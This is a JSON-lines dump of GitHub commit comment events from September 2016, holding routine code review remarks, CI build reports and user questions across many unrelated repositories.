{"id":"4524048038","type":"CommitCommentEvent","actor":{"login":"jdsmith3000"},"repo":{"name":"w3c/web-platform-tests"},"payload":{"comment":{"id":18919183,"position":30,"line":139,"path":"media-source/mediasource-duration.html","commit_id":"ac5ec11034dd80aea6f3078b070b82bc107600b7","created_at":"2016-09-06T21:34:15Z","updated_at":"2016-09-06T21:34:15Z","body":"I beleive this comment is correct and needs to be addressed before this PR gets merged."}},"created_at":"2016-09-06T21:34:15Z"}
{"id":"4524049340","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919185,"position":null,"line":null,"path":null,"commit_id":"887de65992d5b424c584afcd6e72da77faf85a68","created_at":"2016-09-06T21:34:30Z","updated_at":"2016-09-06T21:34:30Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:34:30Z"}
{"id":"4524057991","type":"CommitCommentEvent","actor":{"login":"CourseraSentMe"},"repo":{"name":"CourseraSentMe/Repo1a"},"payload":{"comment":{"id":18919203,"position":2,"line":2,"path":"README.md","commit_id":"e1f4c2b8184c459510ecde05b646ba23e2c7d940","created_at":"2016-09-06T21:36:12Z","updated_at":"2016-09-06T21:36:12Z","body":"I am going to become a data scientist. I will develop the skills to do so using Coursera, and eventually I will get a masters. I will document my progress and save my code here.\r\nThank you."}},"created_at":"2016-09-06T21:36:12Z"}
{"id":"4524061629","type":"CommitCommentEvent","actor":{"login":"cyberguznet"},"repo":{"name":"jyacot/soporte"},"payload":{"comment":{"id":18919209,"position":null,"line":null,"path":null,"commit_id":"f6230a47bdb528b2f73f2258bb4ede76c92b4fd5","created_at":"2016-09-06T21:36:53Z","updated_at":"2016-09-06T21:36:53Z","body":"me podrias pasar el script sql?"}},"created_at":"2016-09-06T21:36:53Z"}
{"id":"4524062597","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18919214,"position":null,"line":null,"path":null,"commit_id":"95ddbbe3fcde87eb2285a3afbacd95be1ba51058","created_at":"2016-09-06T21:37:06Z","updated_at":"2016-09-06T21:37:06Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - i386-Windows-7-VisualStudio-12: OK (2331 of 2334 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-95ddbbe3fcde87eb2285a3afbacd95be1ba51058-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T21:37:06Z"}
{"id":"4524064288","type":"CommitCommentEvent","actor":{"login":"programmation"},"repo":{"name":"programmation/FreshMvvm"},"payload":{"comment":{"id":18919216,"position":null,"line":null,"path":null,"commit_id":"2cff45b4c3462a4d117d8950b8f78bbdc0f78d8e","created_at":"2016-09-06T21:37:24Z","updated_at":"2016-09-06T21:37:24Z","body":"Merge upstream repo."}},"created_at":"2016-09-06T21:37:24Z"}
{"id":"4524067088","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18919220,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-06T21:37:54Z","updated_at":"2016-09-06T21:37:54Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-06T21:37:54Z"}
{"id":"4524067463","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":18919222,"position":null,"line":null,"path":null,"commit_id":"da12d31077205df0becc438a75ed6cb59437dc90","created_at":"2016-09-06T21:37:58Z","updated_at":"2016-09-06T21:37:58Z","body":"Not yet finished, some repos misses the merge atm (I don't have time now, sorry)"}},"created_at":"2016-09-06T21:37:58Z"}
{"id":"4524067770","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18919224,"position":null,"line":null,"path":null,"commit_id":"813b0120da510e01257e69ec8ca08409b8b42e05","created_at":"2016-09-06T21:38:01Z","updated_at":"2016-09-06T21:38:01Z","body":"The following doc(s) have been deployed to the [cdereserve](https://cdereserve-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/multidev](https://cdereserve-static-docs.pantheonsite.io/docs/multidev)\n"}},"created_at":"2016-09-06T21:38:01Z"}
{"id":"4524069656","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron"},"payload":{"comment":{"id":18919226,"position":null,"line":null,"path":null,"commit_id":"02ef91f1d6afed009cdf0a1c823a77f578a73e4d","created_at":"2016-09-06T21:38:23Z","updated_at":"2016-09-06T21:38:23Z","body":"++"}},"created_at":"2016-09-06T21:38:23Z"}
{"id":"4524079017","type":"CommitCommentEvent","actor":{"login":"julioapc16"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919248,"position":null,"line":null,"path":null,"commit_id":"0761b70a76d2851e1fef665c3b592ca7c78496fe","created_at":"2016-09-06T21:40:13Z","updated_at":"2016-09-06T21:40:13Z","body":"Friend makes a version HENkaku-Android for android 2.3.6?\r\n"}},"created_at":"2016-09-06T21:40:13Z"}
{"id":"4524079074","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18919249,"position":null,"line":null,"path":null,"commit_id":"5b2bf6c496d177aa1abb3620d46602d358e60b1a","created_at":"2016-09-06T21:40:14Z","updated_at":"2016-09-06T21:40:14Z","body":"os_2_0_develop (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b2bf6c496d177aa1abb3620d46602d358e60b1a-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b2bf6c496d177aa1abb3620d46602d358e60b1a-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T21:40:14Z"}
{"id":"4524083088","type":"CommitCommentEvent","actor":{"login":"cch1"},"repo":{"name":"cch1/http.async.client"},"payload":{"comment":{"id":18919261,"position":null,"line":null,"path":null,"commit_id":"d441012ff8c78c7dbba54336fb8699500abfa19e","created_at":"2016-09-06T21:41:02Z","updated_at":"2016-09-06T21:41:02Z","body":"Thanks!  I have done so."}},"created_at":"2016-09-06T21:41:02Z"}
{"id":"4524083388","type":"CommitCommentEvent","actor":{"login":"Aangiix3"},"repo":{"name":"NoCheatPlus/NoCheatPlus"},"payload":{"comment":{"id":18919264,"position":null,"line":null,"path":null,"commit_id":"4b76522b06a325af0dd124a383daa8dc603d3085","created_at":"2016-09-06T21:41:06Z","updated_at":"2016-09-06T21:41:06Z","body":"I don't get this.\r\nYou put so much work into this and it's safe, reliable, no false positives - yet it compares very poorly to hack detection of AAC - why is that? Can't you release like a kickass new version which just smashes AAC?"}},"created_at":"2016-09-06T21:41:06Z"}
{"id":"4524084227","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18919267,"position":3,"line":3,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-06T21:41:15Z","updated_at":"2016-09-06T21:41:15Z","body":"Should we reword it as Off-The-Record?"}},"created_at":"2016-09-06T21:41:15Z"}
{"id":"4524085186","type":"CommitCommentEvent","actor":{"login":"yasinishyn"},"repo":{"name":"itspoma/wp-odsc-tickets-plugin"},"payload":{"comment":{"id":18919271,"position":10,"line":16,"path":"odsc-scheduler-plugin/scripts/main.js","commit_id":"e496490c5fae8a5eece30f603505dc441263441f","created_at":"2016-09-06T21:41:26Z","updated_at":"2016-09-06T21:41:26Z","body":"WTF?\r\nSeriously! Dude.... \r\nRemove this new-line."}},"created_at":"2016-09-06T21:41:26Z"}
{"id":"4524087594","type":"CommitCommentEvent","actor":{"login":"xomaczar"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919280,"position":null,"line":null,"path":null,"commit_id":"dde1efc2b9937db456ca45b890bfc7e1a6593dd0","created_at":"2016-09-06T21:41:55Z","updated_at":"2016-09-06T21:41:55Z","body":"I know the reasons behind the triggerClass, I am inclined to keep the surface api consistent with other ep components, all of which use/will use class=\"flex\". Thoughts?"}},"created_at":"2016-09-06T21:41:55Z"}
{"id":"4524088025","type":"CommitCommentEvent","actor":{"login":"haliphax"},"repo":{"name":"haliphax/x84"},"payload":{"comment":{"id":18919282,"position":null,"line":null,"path":null,"commit_id":"90bd145c0ed81417d8ea9981a570329dc012d6a2","created_at":"2016-09-06T21:42:00Z","updated_at":"2016-09-06T21:42:00Z","body":"Relies on a modified version of `sqlitedict` that supports the `limit`, `reverse`, and `offset` parameters"}},"created_at":"2016-09-06T21:42:00Z"}
{"id":"4524088565","type":"CommitCommentEvent","actor":{"login":"TDargentina"},"repo":{"name":"8amLab/8amLib"},"payload":{"comment":{"id":18919285,"position":4,"line":0,"path":"Deadline/Repository/submission/Houdini/Main/SubmitHoudiniToDeadline.py","commit_id":"4b297d423c61cbec25a64647acf122826100e99b","created_at":"2016-09-06T21:42:08Z","updated_at":"2016-09-06T21:42:08Z","body":"Hay que borrar esta linea quedo de una prueba que hice"}},"created_at":"2016-09-06T21:42:08Z"}
{"id":"4524091886","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18919299,"position":null,"line":null,"path":null,"commit_id":"ed1db5db49cace775aae2e9c9e9dce215a282983","created_at":"2016-09-06T21:42:46Z","updated_at":"2016-09-06T21:42:46Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed1db5db49cace775aae2e9c9e9dce215a282983-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ed1db5db49cace775aae2e9c9e9dce215a282983-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T21:42:46Z"}
{"id":"4524095367","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18919304,"position":7,"line":7,"path":"otrv4.txt","commit_id":"661ff8897438ee22c9f39256ed615b1f3a32574b","created_at":"2016-09-06T21:43:31Z","updated_at":"2016-09-06T21:43:31Z","body":"The lists of specific security properties are in each section depending on the conversation flavor, e. g. Online conversations has the (as of now incomplete) list of security properties we expect to provide in that scenario.\r\nThe overview is just a description of what this protocol is guiding you to build."}},"created_at":"2016-09-06T21:43:31Z"}
{"id":"4524095820","type":"CommitCommentEvent","actor":{"login":"blookvoodow"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18919306,"position":null,"line":null,"path":null,"commit_id":"756fd9e195dca426ba2fc4629b19ea2cfabc201d","created_at":"2016-09-06T21:43:37Z","updated_at":"2016-09-06T21:43:37Z","body":"also seeing setsockopt returning 0, so goodbye nagle! I'm sure you just made a lot of people happy."}},"created_at":"2016-09-06T21:43:37Z"}
{"id":"4524097789","type":"CommitCommentEvent","actor":{"login":"xomaczar"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919312,"position":null,"line":null,"path":null,"commit_id":"3c1a56cd367da321663ea82d0c5e168de0fd0e36","created_at":"2016-09-06T21:44:01Z","updated_at":"2016-09-06T21:44:01Z","body":"Do we want destructure escapeExpression? How about using ember-cli-shims?"}},"created_at":"2016-09-06T21:44:01Z"}
{"id":"4524103270","type":"CommitCommentEvent","actor":{"login":"jucallme"},"repo":{"name":"mglaman/drupal-commerce-behat"},"payload":{"comment":{"id":18919323,"position":null,"line":null,"path":null,"commit_id":"24cb4651ed262d07e79d256540b1db045e801b87","created_at":"2016-09-06T21:45:11Z","updated_at":"2016-09-06T21:45:11Z","body":"seems like it does not work for me...\r\n\r\ndefault:\r\n  extensions:\r\n    Behat\\MinkExtension\\Extension:\r\n      goutte: null\r\n      default_session: goutte\r\n      javascript_session: selenium2\r\n      selenium2:\r\n        wd_host: 'http://127.0.0.1:4444/wd/hub'\r\n      base_url: 'http://local.pacificabeauty.com'\r\n    Drupal\\DrupalExtension\\Extension:\r\n      blackbox: null\r\n      api_driver: drupal\r\n      drupal:\r\n        drupal_root: /Users/lathan/Sites/drupalconnect/pacifica\r\n      drush:\r\n        alias: '@self'\r\n    Drupal\\DrupalExtension:\r\n      subcontexts:\r\n      paths: /Users/lathan/Sites/drupalconnect/pacifica/sites/all/modules/contrib/commerce_behat/tests/steps\r\n\r\n\r\n\r\nI get a bunch of errors on drush brun the first of which is \r\nPHP Warning:  require(Drupal\\DrupalExtension): failed to open stream: No such file or directory in /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/src/Behat/Behat/Extension/ExtensionManager.php on line 112\r\nPHP Stack trace:\r\nPHP   1. {main}() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/bin/behat:0\r\nPHP   2. Symfony\\Component\\Console\\Application->run() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/bin/behat:32\r\nPHP   3. Behat\\Behat\\Console\\BehatApplication->doRun() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/symfony/console/Application.php:123\r\nPHP   4. Behat\\Behat\\Console\\BehatApplication->createCommand() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/src/Behat/Behat/Console/BehatApplication.php:66\r\nPHP   5. Behat\\Behat\\Console\\BehatApplication->createContainer() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/src/Behat/Behat/Console/BehatApplication.php:80\r\nPHP   6. Behat\\Behat\\Console\\BehatApplication->loadCoreExtension() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/src/Behat/Behat/Console/BehatApplication.php:93\r\nPHP   7. Behat\\Behat\\DependencyInjection\\BehatExtension->load() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/src/Behat/Behat/Console/BehatApplication.php:165\r\nPHP   8. Behat\\Behat\\Extension\\ExtensionManager->activateExtension() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/src/Behat/Behat/DependencyInjection/BehatExtension.php:63\r\nPHP   9. Behat\\Behat\\Extension\\ExtensionManager->initializeExtension() /Users/lathan/Sites/drupalconnect/pacifica/sites/all/vendor/behat/behat/src/Behat/Behat/Extension/ExtensionManager.php:42"}},"created_at":"2016-09-06T21:45:11Z"}
{"id":"4524105456","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18919325,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-06T21:45:38Z","updated_at":"2016-09-06T21:45:38Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T21:45:38Z"}
{"id":"4524106562","type":"CommitCommentEvent","actor":{"login":"iapazmino"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18919327,"position":2,"line":1,"path":"otrv4.md","commit_id":"b55733bad235ba5d710fa0009391ce7c22380d20","created_at":"2016-09-06T21:45:53Z","updated_at":"2016-09-06T21:45:53Z","body":"Right.\r\nRemoved."}},"created_at":"2016-09-06T21:45:53Z"}
{"id":"4524107925","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18919335,"position":null,"line":null,"path":null,"commit_id":"8450065f4c804956f26a5f3ec0e3325125ecb164","created_at":"2016-09-06T21:46:12Z","updated_at":"2016-09-06T21:46:12Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.246.8450065f4c804956f26a5f3ec0e3325125ecb164](http://build.palaso.org/viewLog.html?buildId=76487&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:08"}},"created_at":"2016-09-06T21:46:12Z"}
{"id":"4524112113","type":"CommitCommentEvent","actor":{"login":"Dormanil"},"repo":{"name":"NogginBops/SKON.NET"},"payload":{"comment":{"id":18919343,"position":5,"line":9,"path":"SKON.NET/SKON.NET/SKON.NET.csproj","commit_id":"b03e3e6a6d718709ce43ab9aab856b66beb1ecf9","created_at":"2016-09-06T21:47:05Z","updated_at":"2016-09-06T21:47:05Z","body":"Okay, why did we switch over from dll to application? Other programs normally don't call a third party exe to do stuff for them but include dlls."}},"created_at":"2016-09-06T21:47:05Z"}
{"id":"4524118528","type":"CommitCommentEvent","actor":{"login":"ericrlin"},"repo":{"name":"BarnabasRobotics/Barnabas-Bot-Code"},"payload":{"comment":{"id":18919359,"position":null,"line":null,"path":null,"commit_id":"3c46642fdf94d6ee6b2b174bbb3afcf677803f1e","created_at":"2016-09-06T21:48:26Z","updated_at":"2016-09-06T21:48:26Z","body":"version 20140702"}},"created_at":"2016-09-06T21:48:26Z"}
{"id":"4524119190","type":"CommitCommentEvent","actor":{"login":"mjerwin"},"repo":{"name":"kitbs/laravel-notifications-clockworksms"},"payload":{"comment":{"id":18919361,"position":null,"line":null,"path":null,"commit_id":"5d61deb7e49b67abd5bf8854c928d976a4ef007a","created_at":"2016-09-06T21:48:34Z","updated_at":"2016-09-06T21:48:34Z","body":"Hi kitbs,\r\n\r\nThanks for using my library!\r\n\r\nFeel free to drop me a message or submit a pull request if you need anything.\r\nI'm planning to add some unit tests at some point in the future when I find the time, so hopefully that will help you out.\r\n\r\nThanks again,\r\n\r\nMatthew"}},"created_at":"2016-09-06T21:48:34Z"}
{"id":"4524119192","type":"CommitCommentEvent","actor":{"login":"stalincaiche"},"repo":{"name":"stalincaiche/nodejs_primeros_pasos"},"payload":{"comment":{"id":18919362,"position":null,"line":null,"path":null,"commit_id":"b7d4412c646850db2038496b1afe6cd53e8b42d9","created_at":"2016-09-06T21:48:34Z","updated_at":"2016-09-06T21:48:34Z","body":"Creando nuestra primer Hola! Mundo con Nodejs "}},"created_at":"2016-09-06T21:48:34Z"}
{"id":"4524121699","type":"CommitCommentEvent","actor":{"login":"juanpabloRV"},"repo":{"name":"nmaguirre/minesweeper"},"payload":{"comment":{"id":18919366,"position":null,"line":null,"path":null,"commit_id":"c2ce2253208a66057591ca8f660178cf6e88a8b9","created_at":"2016-09-06T21:49:08Z","updated_at":"2016-09-06T21:49:08Z","body":"This constructor does not verify that the parameter \"mines\" is within the range 0<=mines<=(row*col)"}},"created_at":"2016-09-06T21:49:08Z"}
{"id":"4524123863","type":"CommitCommentEvent","actor":{"login":"jimfenton"},"repo":{"name":"tozny/800-63-3"},"payload":{"comment":{"id":18919374,"position":null,"line":null,"path":null,"commit_id":"474a28e17620856579073450399bf526205bd46f","created_at":"2016-09-06T21:49:35Z","updated_at":"2016-09-06T21:49:35Z","body":"Actually the current form of the reference, just #appA, works correctly for the combined document as it appears on pages.nist.gov. Thanks for catching the other error."}},"created_at":"2016-09-06T21:49:35Z"}
{"id":"4524127265","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18919384,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-06T21:50:21Z","updated_at":"2016-09-06T21:50:21Z","body":"Port. Lol."}},"created_at":"2016-09-06T21:50:21Z"}
{"id":"4524129135","type":"CommitCommentEvent","actor":{"login":"miguelcobain"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919386,"position":null,"line":null,"path":null,"commit_id":"3c1a56cd367da321663ea82d0c5e168de0fd0e36","created_at":"2016-09-06T21:50:45Z","updated_at":"2016-09-06T21:50:45Z","body":"> How about using ember-cli-shims?\r\n\r\nI don't know if ember-cli-shims is the *final* way we will be using ember modules. I honestly hope not. At any rate, if we ever use it we can tackle that in a separate PR. Using `Ember.` destructuring keeps the project code style consistent, which is more important than using shims IMO. Using shims vs something vs destructuring can be tackled when the whole issue is more clear.\r\n\r\n> Do we want to destructure escapeExpression?\r\n\r\nRight. We should. I'm not giving it too much importance because in newest ember-suave versions, the usage of `Ember.something` is forbidden. When we update ember-suave, all those errors will popup, and we solve them all at once."}},"created_at":"2016-09-06T21:50:45Z"}
{"id":"4524132275","type":"CommitCommentEvent","actor":{"login":"brickibezz"},"repo":{"name":"solvek/streamer.bundle"},"payload":{"comment":{"id":18919394,"position":null,"line":null,"path":null,"commit_id":"5f3e224ab07ddd56f53f8fb8ae4f56d944999b93","created_at":"2016-09-06T21:51:23Z","updated_at":"2016-09-06T21:51:23Z","body":"what dose this plugin do?"}},"created_at":"2016-09-06T21:51:23Z"}
{"id":"4524135794","type":"CommitCommentEvent","actor":{"login":"fernandog"},"repo":{"name":"fernandog/SickRage"},"payload":{"comment":{"id":18919401,"position":6,"line":24,"path":"gui/slick/views/config_postProcessing.mako","commit_id":"a636da1f96c074a524e7bdeb4856b6a7ed900f1f","created_at":"2016-09-06T21:52:04Z","updated_at":"2016-09-06T21:52:04Z","body":"@JonathanGorbutt you can fix by editing this file and doing this change"}},"created_at":"2016-09-06T21:52:04Z"}
{"id":"4524135889","type":"CommitCommentEvent","actor":{"login":"codestation"},"repo":{"name":"codestation/henkaku-android"},"payload":{"comment":{"id":18919402,"position":null,"line":null,"path":null,"commit_id":"0761b70a76d2851e1fef665c3b592ca7c78496fe","created_at":"2016-09-06T21:52:05Z","updated_at":"2016-09-06T21:52:05Z","body":"You could open an issue instead of spamming me with +20 messages.\r\n\r\nAnyway, go to: https://github.com/codestation/henkaku-android/issues/3"}},"created_at":"2016-09-06T21:52:05Z"}
{"id":"4524141835","type":"CommitCommentEvent","actor":{"login":"Kakifrucht"},"repo":{"name":"NoCheatPlus/NoCheatPlus"},"payload":{"comment":{"id":18919414,"position":null,"line":null,"path":null,"commit_id":"4b76522b06a325af0dd124a383daa8dc603d3085","created_at":"2016-09-06T21:53:18Z","updated_at":"2016-09-06T21:53:18Z","body":"First of all, AAC works a bit different in many regards than NCP. AAC uses proactive measures (fake entities and such) to detect cheating in PvP. NCP only detects if a player doesn't behave \"right\" (generally).\r\n\r\nSecondly NCP is public and free, most cheat clients will perfectly be tailored to work around the most mainstream of all AntiCheats, which is NCP. Additionally, AAC is more difficult to reverse engineer due to obfuscation and the fact that it is paid.\r\n\r\nOf course NCP will be hit harder, but it's necessary as well and it does a fine job if you maybe tweak it here and there and put more effort into spotting the cheaters."}},"created_at":"2016-09-06T21:53:18Z"}
{"id":"4524143398","type":"CommitCommentEvent","actor":{"login":"Alkallid"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18919416,"position":null,"line":null,"path":null,"commit_id":"71f4105a37f73968fe18cd4b63f49d62b723aad0","created_at":"2016-09-06T21:53:37Z","updated_at":"2016-09-06T21:53:37Z","body":"No more dominating a planet before all the ships take off and seeing tiny ships exploding."}},"created_at":"2016-09-06T21:53:37Z"}
{"id":"4524145880","type":"CommitCommentEvent","actor":{"login":"nonflammable"},"repo":{"name":"nonflammable/ESPEasyPluginPlayground"},"payload":{"comment":{"id":18919420,"position":null,"line":null,"path":null,"commit_id":"b93f9219a7a82f86e3ec1963a951bc13ac69cec8","created_at":"2016-09-06T21:54:09Z","updated_at":"2016-09-06T21:54:09Z","body":"Plugin moved to ESPEasy as P035 (R124)"}},"created_at":"2016-09-06T21:54:09Z"}
{"id":"4524146615","type":"CommitCommentEvent","actor":{"login":"BobRyan530"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18919422,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-06T21:54:17Z","updated_at":"2016-09-06T21:54:17Z","body":"I encountered this problem on a linux mint machine. Below fixed it for me.\r\n\r\nif platform.linux_distribution()[0] in (\"Ubuntu\", \"LinuxMint\"):"}},"created_at":"2016-09-06T21:54:17Z"}
{"id":"4524147524","type":"CommitCommentEvent","actor":{"login":"jakemager"},"repo":{"name":"kimtracy/TSPFall2016"},"payload":{"comment":{"id":18919425,"position":null,"line":null,"path":null,"commit_id":"d70d5f2f671ec1edabe47a7480b13eeff97d540f","created_at":"2016-09-06T21:54:29Z","updated_at":"2016-09-06T21:54:29Z","body":"Added information on Jake Mager"}},"created_at":"2016-09-06T21:54:29Z"}
{"id":"4524149514","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18919432,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T21:54:56Z","updated_at":"2016-09-06T21:54:56Z","body":"@Nadahar I known, i overreacted to your \"NOT\".\r\n\r\nIMHO nothing will broken, he just that from that old time (r376) with UPnP documentation and test..\r\nhttp://webcache.googleusercontent.com/search?q=cache:a-plsvZgRO8J:www.ps3mediaserver.org/forum/viewtopic.php%3Ff%3D2%26t%3D3217+&cd=1&hl=fr&ct=clnk&gl=fr\r\nWhy do you want it broke something ? we are just doing the same more correctly.\r\nAnyway, we have developper with PS3 to test it :wink: \r\n\r\nI didn't know about that other commit, so now you will the LPCM/audio guy for me as @valib is the subtitles guy and @SubJunk the encoding engine guy. Yeaa..i know it's a little simplist but it just an affective nickname :wink: "}},"created_at":"2016-09-06T21:54:56Z"}
{"id":"4524150042","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18919433,"position":null,"line":null,"path":null,"commit_id":"ef1241fa9e4da18682fa18d537b5e5aef1cd19f5","created_at":"2016-09-06T21:55:03Z","updated_at":"2016-09-06T21:55:03Z","body":"@olesalscheider I think it would be much easier to review in a single commit, because diff from the previous version to this would be bigger, than this commit as a clear patch to master.\r\n```diff\r\n debug.cc | 132 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++---------------------------------------------------------------------------\r\n debug.hh |   9 +++++++--\r\n main.cc  |   6 +++---\r\n 3 files changed, 67 insertions(+), 80 deletions(-)\r\n```"}},"created_at":"2016-09-06T21:55:03Z"}
{"id":"4524150312","type":"CommitCommentEvent","actor":{"login":"flibijuan"},"repo":{"name":"flibijuan/meteor"},"payload":{"comment":{"id":18919435,"position":null,"line":null,"path":null,"commit_id":"01dbfe65425b1728c0bf5ece54998df025e51c80","created_at":"2016-09-06T21:55:07Z","updated_at":"2016-09-06T21:55:07Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;T6KgNp2R&#x2F;1-hg\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> hg</a>"}},"created_at":"2016-09-06T21:55:07Z"}
